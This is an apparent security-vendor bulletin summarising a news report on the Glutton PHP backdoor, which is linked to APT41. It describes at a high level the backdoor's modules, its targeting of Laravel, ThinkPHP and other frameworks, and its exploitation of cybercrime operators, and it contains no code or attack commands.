Discover how vulnerabilities in popular PHP frameworks like Laravel and ThinkPHP can lead to significant security threats and learn how CloudGuard can protect against such modular malware attacks.

Risks:

Malware, Web App/Website Vulnerability, Open Source, Zero-Day

Keywords:

Glutton malware, PHP frameworks, Winnti, APT41, cybercrime market, Laravel, ThinkPHP, ELF backdoor

CVE:

N/A

Affected:

Laravel, ThinkPHP, Yii, Baota (BT), PHP frameworks, FastCGI Process Manager, ELF backdoor, cybercrime forums

 

New Glutton Malware Targets PHP Frameworks

Cybersecurity researchers have identified a new malware threat named Glutton that exploits popular PHP frameworks. This PHP-based backdoor has been involved in cyberattacks affecting countries such as China, the United States, Cambodia, Pakistan, and South Africa. It has been linked to the Chinese nation-state group known as Winnti (APT41).

Targeting the Cybercrime Market

Glutton's creators have taken an unusual approach by targeting systems within the cybercrime market. Their goal is to turn the tools of cybercriminals against them, highlighting the adage "no honor among thieves."

Exploiting PHP Frameworks

The malware is designed to harvest sensitive information, drop an ELF backdoor component, and perform code injection against popular PHP frameworks, including Laravel, ThinkPHP, Yii, and Baota (BT). The ELF malware is nearly identical to a known Winnti tool called PWNLNX.

Shortcomings in Stealth

Despite its links to Winnti, Glutton lacks the stealth features typically associated with the group. It uses unencrypted HTTP for downloading payloads and lacks obfuscation, making it less covert than expected.

Modular Malware Framework

Glutton is a modular framework that infects PHP files and plants backdoors. It gains initial access through the exploitation of zero-day and N-day vulnerabilities and brute-force attacks. The malware also advertises on cybercrime forums, offering compromised enterprise hosts with backdoors for further attacks.

Key Modules

• task_loader: Assesses the execution environment and fetches additional components.
• init_task: Downloads an ELF-based backdoor disguised as the FastCGI Process Manager, infects PHP files, collects sensitive information, and modifies system files.
• client_loader: An updated version of init_task, using a new network infrastructure to download and execute a backdoored client, establishing persistence by modifying system files.

Backdoor Capabilities

The PHP backdoor supports 22 unique commands, enabling it to switch C2 connections, launch a shell, manage files, and execute arbitrary PHP code. It periodically polls the C2 server to fetch and run more PHP payloads, ensuring a stealthy footprint by executing code within PHP processes.

Exploiting Cybercrime Resources

Glutton also uses the HackBrowserData tool to steal information from cybercrime operators, likely to inform future phishing or social engineering campaigns. This strategy of exploiting cybercrime resources creates a recursive attack chain.

Recent Developments

The discovery of Glutton follows an update on another APT41 malware, Mélofée, which has improved persistence mechanisms and stealth capabilities. Mélofée uses an RC4-encrypted kernel driver to mask traces of its activities and is used selectively against high-value targets.

 

Read More

https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html?m=1